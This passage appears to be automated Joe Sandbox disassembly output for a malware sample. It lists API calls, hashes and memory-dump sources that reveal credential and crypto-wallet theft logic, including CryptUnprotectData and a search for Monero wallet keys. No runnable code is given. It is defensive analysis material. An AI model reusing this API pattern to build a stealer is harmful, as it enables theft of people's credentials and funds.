                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: b080f7b10b3cae31f8879d082b37d054f0fb314749da36a863ac7179955c692c
                          • Instruction ID: 1410548b20a41150cfdad14f23d47c8008eb9d30189d1320becef4515808ee6e
                          • Opcode Fuzzy Hash: b080f7b10b3cae31f8879d082b37d054f0fb314749da36a863ac7179955c692c
                          • Instruction Fuzzy Hash: 34118EB1E45218EFEB249B55DC49FA9BB78FB04721F1043AAE91AA32C0C7741A84CF51
                          APIs
                          • CoCreateInstance.COMBASE(00C0E118,00000000,00000001,00C0E108,00000000), ref: 00C03758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C037B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: e20d370372cec9a58273670e078aadf6633f383375cda93c3efeb955fbf92b68
                          • Instruction ID: cebb62410cfea2538711ed6d0cd616dd7af24bf75db97c6be3365a8bc6e3f309
                          • Opcode Fuzzy Hash: e20d370372cec9a58273670e078aadf6633f383375cda93c3efeb955fbf92b68
                          • Instruction Fuzzy Hash: 9041EA70A40A189FDB24DB58CC95B9BB7B5BB48702F4082D9E608E72D0D7B16EC5CF50
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BF9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BF9BA3
                          • LocalFree.KERNEL32(?), ref: 00BF9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: d24a32f628bdfcd943ebc37290def93a51a3d58be5152d56ea720b899ce89ba6
                          • Instruction ID: e2fc5720bafc134c222db821096c5ea2e5a42e1a06e0e1b9c19600d405ed3d23
                          • Opcode Fuzzy Hash: d24a32f628bdfcd943ebc37290def93a51a3d58be5152d56ea720b899ce89ba6
                          • Instruction Fuzzy Hash: 4B11F7B8A00209EFCB04DF95D989AAEB7F5FF88300F1045A8E915A7350D770AE54CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: a~<$|>~
                          • API String ID: 0-3362253586
                          • Opcode ID: 6d6a57bd8d06a2b3389c409931d5e9037a78756498867a0d082f38d7f48d173f
                          • Instruction ID: ff08e40ecf68547cc002d3394812187625d98a9769e8e31b9509bd98291f41b7
                          • Opcode Fuzzy Hash: 6d6a57bd8d06a2b3389c409931d5e9037a78756498867a0d082f38d7f48d173f
                          • Instruction Fuzzy Hash: D4B2D4B360C204AFE304AE29DC8567AFBE9EF94720F16893DEAC5C3740E63558418797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: OZj9$Y[_.
                          • API String ID: 0-741291601
                          • Opcode ID: 8bba37f8a1eb65af586c43ab59f324d69b03898ef8babfa645f527100cd081ab
                          • Instruction ID: 0974e84061c5d1899884e39a6b3380f1c69b19cc0a94de7f39e7a57311ac13c1
                          • Opcode Fuzzy Hash: 8bba37f8a1eb65af586c43ab59f324d69b03898ef8babfa645f527100cd081ab
                          • Instruction Fuzzy Hash: B561D7F391C2109FF7086E18EC8577AB7E5EB94320F16493DEAC993780DA795C018687
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: asZ~$}5?
                          • API String ID: 0-51315039
                          • Opcode ID: e161e931246179e8692fa030a67ee247441eb31427a2b59424a99a1fbb111b3b
                          • Instruction ID: 784051cdbe729694567e5f5a9f8013030989af7ba4ab5923ad570ba43e44df04
                          • Opcode Fuzzy Hash: e161e931246179e8692fa030a67ee247441eb31427a2b59424a99a1fbb111b3b
                          • Instruction Fuzzy Hash: DC5135F3F152105BE300592AED8476BFADB9BD4320F2B863DDB9893788D9784C064296
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C115B8,00C10D96), ref: 00BFF71E
                          • StrCmpCA.SHLWAPI(?,00C115BC), ref: 00BFF76F
                          • StrCmpCA.SHLWAPI(?,00C115C0), ref: 00BFF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00BFFAC3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: b9074f8e3ae7780192119064c8e6afab13b02e09f91f986b4a5044bca9382748
                          • Instruction ID: cfe7fcee50787ce2f4dd7ab347e411a9827ace9dac3a8c327bd668f56a78f198
                          • Opcode Fuzzy Hash: b9074f8e3ae7780192119064c8e6afab13b02e09f91f986b4a5044bca9382748
                          • Instruction Fuzzy Hash: 1A11547181064D9BDB14FBA0DC55EED7378AF11300F5087A9A51A574D2EF302B4ADB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: j5
                          • API String ID: 0-2515281012
                          • Opcode ID: 7b80ed9dc83d41aed76422bb813bb8bd1d6cff8922366e15b42b9be0c9a58bb6
                          • Instruction ID: 123194474b522fc5e0d2f8cbfbe2bb8dcc2b398833abaf9c228e6faa1addbf36
                          • Opcode Fuzzy Hash: 7b80ed9dc83d41aed76422bb813bb8bd1d6cff8922366e15b42b9be0c9a58bb6
                          • Instruction Fuzzy Hash: 016139B3A082145FE3046E2DDC4477BFBD6EBD4720F1A893EEAC987780E97558058686
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1mo_
                          • API String ID: 0-812458918
                          • Opcode ID: 34320cc994e4a6c66907d4a1292ef63f81ddd98d28bef5daad538407d2b42e7f
                          • Instruction ID: 416d5ba17d787749756fc0bc8b9536eed32859dea238a1c732709359e4d5d50d
                          • Opcode Fuzzy Hash: 34320cc994e4a6c66907d4a1292ef63f81ddd98d28bef5daad538407d2b42e7f
                          • Instruction Fuzzy Hash: 6261CFF3E183149BE3046E29EC4976AB7D6DBD4720F1E863DDA84C7784F9399C058285
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: aEo
                          • API String ID: 0-771878426
                          • Opcode ID: 5129736af3666108b5e8a0703943461afaf692a788f6d8f3b5078244c7d9af18
                          • Instruction ID: eb26286b79e701d3e6cfa7bcdfc43fb7bb0275a9ae1e858836b6a0b2949bae64
                          • Opcode Fuzzy Hash: 5129736af3666108b5e8a0703943461afaf692a788f6d8f3b5078244c7d9af18
                          • Instruction Fuzzy Hash: D551D6F370C600EFD3045A29DC8563EB7EEEBD4620F29C92EE5C7C6654EA3188018653
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7Akv
                          • API String ID: 0-42966678
                          • Opcode ID: bdc4a68fd39859dbef97d8b02ef4bcfcf8d79f2acb29059da7e7f76a5f72e7b8
                          • Instruction ID: 5b0112414dfe9216c13b5219358205e4e8d587a6c58650d492ebb069a66c4d65
                          • Opcode Fuzzy Hash: bdc4a68fd39859dbef97d8b02ef4bcfcf8d79f2acb29059da7e7f76a5f72e7b8
                          • Instruction Fuzzy Hash: 9E5104F3E081245BF350A929DC097AAB6D9DBD4360F1B853DDEC8D3784E87A9D0582C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -}
                          • API String ID: 0-1227557316
                          • Opcode ID: 04046e41e1ca3e73e06080f6a3f15c2db4b0f467fa3c002624836fbf4a18c954
                          • Instruction ID: 028919c841db270327081c0eafdec9b37a5d3d50e534a3c7154def372ad76719
                          • Opcode Fuzzy Hash: 04046e41e1ca3e73e06080f6a3f15c2db4b0f467fa3c002624836fbf4a18c954
                          • Instruction Fuzzy Hash: 31415BF390C700DFD3041A94BC9567EBBD8EB086A2F95853FE6C296340F57188108796
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;0z{
                          • API String ID: 0-805469412
                          • Opcode ID: c038d0fa1706c44c6133cb9f54996847385439cc93bb59a0dddfa1538cc8f8a6
                          • Instruction ID: f5f95aa0bb922498151c741f10b9996056c6ef8c785321c6a0a149bb5a8b11db
                          • Opcode Fuzzy Hash: c038d0fa1706c44c6133cb9f54996847385439cc93bb59a0dddfa1538cc8f8a6
                          • Instruction Fuzzy Hash: 5C215BF351C100AFE308D979DC91737B2EADB98364F2A0A2EF286D7350D57158019267
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14f4766ece39803c4f52a9a7c645e44411505e5b23e6630a926477185e3ca8c6
                          • Instruction ID: 5e1a536470cb566871d3c7db80486c76d8a366d6a285bea7f505b7a03a83f7db
                          • Opcode Fuzzy Hash: 14f4766ece39803c4f52a9a7c645e44411505e5b23e6630a926477185e3ca8c6
                          • Instruction Fuzzy Hash: 1D614AF3A086009BE3046A19EC457BBBBE6DFD4720F1A853DEAC4C7784E53998018697
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f88dd3ca165b9869b029033fd762a0eebf79d98d5d5a22abd105b0ae939be179
                          • Instruction ID: 31ab12491422f193e0abbcb6d8ba9a7ebea4c7c4cb18204d2eb01ee6e6ecaec1
                          • Opcode Fuzzy Hash: f88dd3ca165b9869b029033fd762a0eebf79d98d5d5a22abd105b0ae939be179
                          • Instruction Fuzzy Hash: C5510BF3A086109FF3046E19EC817BAB7E5EF94324F1A453DEAC497780EA395C0586D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f296bf77830bc0fb0eced49d6973df277a3b577183eda82c979a79a4bc7e160
                          • Instruction ID: dae8be47328b0472a988d95f679c1cb9fdcffb84e7b1cad435a63cdd98a5dde5
                          • Opcode Fuzzy Hash: 7f296bf77830bc0fb0eced49d6973df277a3b577183eda82c979a79a4bc7e160
                          • Instruction Fuzzy Hash: 8C51D3F3A092005FF3049D39DC8576AB7E6EBD4320F2B863DD6C8C7784E97998058692
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 24425b44df29d9c66456e57b87017b0531e0cce72f8bb2a291b1690732896239
                          • Instruction ID: e3afc0fea4d70cc68e6ad1d94416dba3f08ad635f2d71a193ccbcdbf09b4a220
                          • Opcode Fuzzy Hash: 24425b44df29d9c66456e57b87017b0531e0cce72f8bb2a291b1690732896239
                          • Instruction Fuzzy Hash: 7C51D5F3A086149BE3147E19EC857BAFBE5DB94360F17463DDBC883780E93A48058786
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d29bb1afcac6ae05dfe6a964c25afada4bb008d8dd0499a65ff8d635755f248
                          • Instruction ID: ad2aa718f65b358a559f4224308e587f114117a7578839244e11fdee773551b0
                          • Opcode Fuzzy Hash: 0d29bb1afcac6ae05dfe6a964c25afada4bb008d8dd0499a65ff8d635755f248
                          • Instruction Fuzzy Hash: 475168F3B483085BF3486969EC9A7BBB7CAD784324F2A853DDA81D3780FD7998014185
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95c25a7c84c27516308ad7b380c2a91ea59849d67db001ee25331b5825bfbda5
                          • Instruction ID: 1170313ef81b51943ed6dfcb56be278320e5a6e1727fe115d1107043e179f7cc
                          • Opcode Fuzzy Hash: 95c25a7c84c27516308ad7b380c2a91ea59849d67db001ee25331b5825bfbda5
                          • Instruction Fuzzy Hash: 67514DF3E082148FE3009E2DDC8176AB6D6DFD4321F1AC63DD5C493788E97959188682
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                            • Part of subcall function 00BF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                            • Part of subcall function 00BF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                            • Part of subcall function 00BF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                            • Part of subcall function 00BF99C0: LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                            • Part of subcall function 00BF99C0: CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                            • Part of subcall function 00C08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C08E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00C10DBA,00C10DB7,00C10DB6,00C10DB3), ref: 00C00362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C00369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C00385
